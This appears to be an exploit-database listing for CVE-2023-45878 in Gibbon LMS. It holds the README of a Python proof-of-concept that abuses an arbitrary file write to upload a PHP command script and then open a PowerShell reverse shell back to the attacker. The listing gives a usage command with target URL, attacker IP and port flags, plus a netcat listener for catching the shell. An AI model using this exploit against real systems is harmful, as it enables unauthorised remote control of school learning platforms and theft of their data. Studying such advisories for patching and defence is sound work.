Exploit for Out-of-bounds Write in Gibbonedu Gibbon CVE-2023-45878

Name: Exploit for Out-of-bounds Write in Gibbonedu Gibbon CVE-2023-45878
Rating: 5 (240 reviews)

2025-03-17 | CVSS 9.8

## https://sploitus.com/exploit?id=ECDBF1E0-E981-5FD2-9D7F-475A2F735050
# CVE-2023-45878

Wrote this script based on the work of https://herolab.usd.de/security-advisories/usd-2023-0025/ . The exploit works by using an Arbitrary File Write exploit in Gibbon LMS 25.0.1 . This PoC will use upload a simple php cmd script, and then use that to load a powershell revshell.

```Example
python3 CVE-2023-45878.py -u http://target.com/Gibbon-LMS -l 10.10.16.2 -p 8888 -f asdf
```

Flags:
```
-u, URL where Gibbon LMS is installed.
-l, your IP
-p, your open port
-f, filename. Important if you need to manually test. Default is "asdf".
```

Have a listener ready for the incoming shell.

```
nc -lvnp 8888
```